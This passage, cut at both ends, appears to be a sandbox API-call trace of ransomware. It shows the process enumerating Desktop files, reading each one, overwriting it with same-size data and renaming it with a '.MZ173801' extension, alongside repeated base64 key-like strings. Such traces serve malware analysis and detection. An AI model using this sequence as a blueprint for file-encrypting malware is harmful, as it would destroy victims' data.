lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f6f0*=0x2472, lpOverlapped=0x0) returned 1 [0124.167] CloseHandle (hObject=0x414) returned 1 [0124.168] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\3067xe8riKxNNoH.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\3067xe8rikxnnoh.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\3067xe8riKxNNoH.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\3067xe8rikxnnoh.m4a.mz173801")) returned 1 [0124.168] GetCurrentThreadId () returned 0x1358 [0124.168] GetCurrentThreadId () returned 0x1358 [0124.168] GetCurrentThreadId () returned 0x1358 [0124.168] GetCurrentThreadId () returned 0x1358 [0124.168] GetCurrentThreadId () returned 0x1358 [0124.168] GetCurrentThreadId () returned 0x1358 [0124.168] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea40b20, ftCreationTime.dwHighDateTime=0x1d5eb89, ftLastAccessTime.dwLowDateTime=0x687995b0, ftLastAccessTime.dwHighDateTime=0x1d5e692, ftLastWriteTime.dwLowDateTime=0x687995b0, ftLastWriteTime.dwHighDateTime=0x1d5e692, nFileSizeHigh=0x0, nFileSizeLow=0x9e85, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6ja7hKM dEHm7uKsn.png", cAlternateFileName="6JA7HK~1.PNG")) returned 1 [0124.168] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.168] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\6ja7hKM dEHm7uKsn.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\6ja7hkm dehm7uksn.png"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea40b20, ftCreationTime.dwHighDateTime=0x1d5eb89, ftLastAccessTime.dwLowDateTime=0x687995b0, ftLastAccessTime.dwHighDateTime=0x1d5e692, ftLastWriteTime.dwLowDateTime=0x687995b0, ftLastWriteTime.dwHighDateTime=0x1d5e692, nFileSizeHigh=0x0, nFileSizeLow=0x9e85)) returned 1 [0124.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.169] GetCurrentThreadId () returned 0x1358 [0124.169] GetCurrentThreadId () returned 0x1358 [0124.169] GetCurrentThreadId () returned 0x1358 [0124.170] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.170] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.170] GetCurrentThreadId () returned 0x1358 [0124.170] GetCurrentThreadId () returned 0x1358 [0124.170] GetCurrentThreadId () returned 0x1358 [0124.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\6ja7hKM dEHm7uKsn.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\6ja7hkm dehm7uksn.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.170] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.170] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.170] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x9e85 [0124.170] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.170] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9e85, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x9e85, lpOverlapped=0x0) returned 1 [0124.171] CloseHandle (hObject=0x414) returned 1 [0124.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\6ja7hKM dEHm7uKsn.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\6ja7hkm dehm7uksn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.173] WriteFile (in: hFile=0x414, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9e85, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f6f0*=0x9e85, lpOverlapped=0x0) returned 1 [0124.175] CloseHandle (hObject=0x414) returned 1 [0124.175] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\6ja7hKM dEHm7uKsn.png" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\6ja7hkm dehm7uksn.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\6ja7hKM dEHm7uKsn.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\6ja7hkm dehm7uksn.png.mz173801")) returned 1 [0124.175] GetCurrentThreadId () returned 0x1358 [0124.175] GetCurrentThreadId () returned 0x1358 [0124.175] GetCurrentThreadId () returned 0x1358 [0124.175] GetCurrentThreadId () returned 0x1358 [0124.175] GetCurrentThreadId () returned 0x1358 [0124.175] GetCurrentThreadId () returned 0x1358 [0124.175] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17950850, ftCreationTime.dwHighDateTime=0x1d5e9d0, ftLastAccessTime.dwLowDateTime=0xd38fbf60, ftLastAccessTime.dwHighDateTime=0x1d5e9c5, ftLastWriteTime.dwLowDateTime=0xd38fbf60, ftLastWriteTime.dwHighDateTime=0x1d5e9c5, nFileSizeHigh=0x0, nFileSizeLow=0x180f4, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="76of.jpg", cAlternateFileName="")) returned 1 [0124.175] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.175] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\76of.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\76of.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17950850, ftCreationTime.dwHighDateTime=0x1d5e9d0, ftLastAccessTime.dwLowDateTime=0xd38fbf60, ftLastAccessTime.dwHighDateTime=0x1d5e9c5, ftLastWriteTime.dwLowDateTime=0xd38fbf60, ftLastWriteTime.dwHighDateTime=0x1d5e9c5, nFileSizeHigh=0x0, nFileSizeLow=0x180f4)) returned 1 [0124.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.176] GetCurrentThreadId () returned 0x1358 [0124.176] GetCurrentThreadId () returned 0x1358 [0124.176] GetCurrentThreadId () returned 0x1358 [0124.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFF